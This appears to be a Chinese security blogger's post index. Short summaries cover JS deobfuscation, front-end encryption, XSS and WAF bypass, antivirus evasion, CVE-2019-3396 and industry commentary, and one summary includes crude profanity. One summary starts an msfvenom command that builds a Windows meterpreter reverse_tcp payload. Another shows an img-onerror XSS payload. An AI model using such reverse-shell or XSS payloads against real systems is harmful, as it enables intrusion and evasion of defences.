摘要:
https://github.com/svent/jsdetox 这个是一个比较好的反混淆,针对前端加密还是可以调试的 就是安装比较傻逼,需要bundler1.0左右,老子安装了半天没安装上,我曹你吗的 ruby gem 这个垃圾社区 操你吗! 真的是找骂 一个地址换2次。。。 资料这找不到 那 找 阅读全文
posted @ 2019-08-06 22:30
xsser's
阅读(1766)
评论(0)
推荐(0)
摘要:
前端加密之使用firefox来解密 文本采用(CC-BY-NC-ND) 非商用可转载,不可修改本文内容 随着等保2.0的实施,传输过程中加密变的必要了,很多APP或者手机浏览器端逐步加密了一些加密的措施来解决这个问题,比如以下这样的数据包 一串乱码,什么是什么都看不懂别说修改数据了。。那咋办呢? 我 阅读全文
posted @ 2019-07-25 18:14
xsser's
阅读(1417)
评论(0)
推荐(0)
摘要:
文本采用(CC-BY-NC-ND) 非商用可转载,不可修改本文内容 这是一篇翻译文章,翻译加自己的理解。嗯 不是机器翻译 是我理解后的翻译 谢谢 顺便我会尽可能加上场景和一些业务实际情况解读 原文叫做《Bypassing XSS Detection Mechanisms 》,是个pdf。。。 到时候 阅读全文
posted @ 2019-04-21 23:40
xsser's
阅读(2756)
评论(1)
推荐(0)
摘要:
原文地址是:https://medium.com/@y.shahinzadeh/chaining-multiple-vulnerabilities-waf-bypass-to-account-takeover-in-almost-all-alibabas-websites-f8643eaa2855 阅读全文
posted @ 2019-04-16 02:27
xsser's
阅读(1355)
评论(0)
推荐(0)
摘要:
卧槽 最近闲的没事干 搞一下渗透学习下 拿到 一个域成员权限,但是有360 。。。。(&……% 好烦啊 都不能免杀 突然看到一个帖子 很牛逼 依然到现在还是免杀的 首先msfvenom -p windows/meterpreter/reverse_tcp LPORT=5555 LHOST=192.1 阅读全文
posted @ 2019-04-13 23:49
xsser's
阅读(1078)
评论(0)
推荐(0)
摘要:
https://portswigger.net/blog/top-10-web-hacking-techniques-of-2018 在P神的小密圈里有他相关的解读,当然解读归解读,自己的理解归自己的理解。 等抽空写一下 阅读全文
posted @ 2019-04-11 23:39
xsser's
阅读(233)
评论(0)
推荐(0)
摘要:
<img/src=aaa.jpg onerror=prompt(1); </form> 测试了下 这个编辑器支持img动态加载一些html标签 data-mce-json 对 就是这个属性。。。 然后动态加载的标签。。。好像对转义没做好,dom下 加载&nbsi之类的 转义后的也可以被执行的。。。 阅读全文
posted @ 2019-04-10 20:00
xsser's
阅读(270)
评论(0)
推荐(0)
摘要:
在安恒接触的安全编程教育 主要做了几件事 我创建了一个叫“月赛”的模式,其实这个在acm之类的其他方向也有了,月赛通过免费的方式引入流量沉淀,在直播等下游进行收费,通过复现等方式提供有价值的内容。 主要的价值在于知识,这是真的知识付费。 这个有啥好处呢,相比传统的线下授课,这个方式节约双方的成本,用 阅读全文
posted @ 2019-04-10 18:45
xsser's
阅读(554)
评论(0)
推荐(0)
摘要:
安全圈有一个非常有趣的现象,那就是朋友圈没人发 没一个人发 那这个就没什么人关注 CVE-2019-3396 这个出来2个礼拜了 有人开始刷Twitter看到分析文章了才到朋友圈 然后朋友圈才有人开始分析,然后乙方看到有同行分析了才分析然后发通告。 interesting!!!! ^^ https: 阅读全文
posted @ 2019-04-10 17:28
xsser's
阅读(1009)
评论(0)
推荐(0)
摘要:
本人上个公司是杭州安恒。 最近安恒要上市了,看了下招股书和财务说明,其中最重要的也就是企业的净利润能力,在A股 需要连续5年净利润大于1个亿 但是大家可以看下启明 绿盟 等同行都没有可以上A股的主板 原因就是网络安全不是一个非常大的市场。 看了下上市募集的资金的用途都是一些其他的大型项目。 本人以前 阅读全文
posted @ 2019-04-10 17:22
xsser's
阅读(442)
评论(0)
推荐(0)
浙公网安备 33010602011771号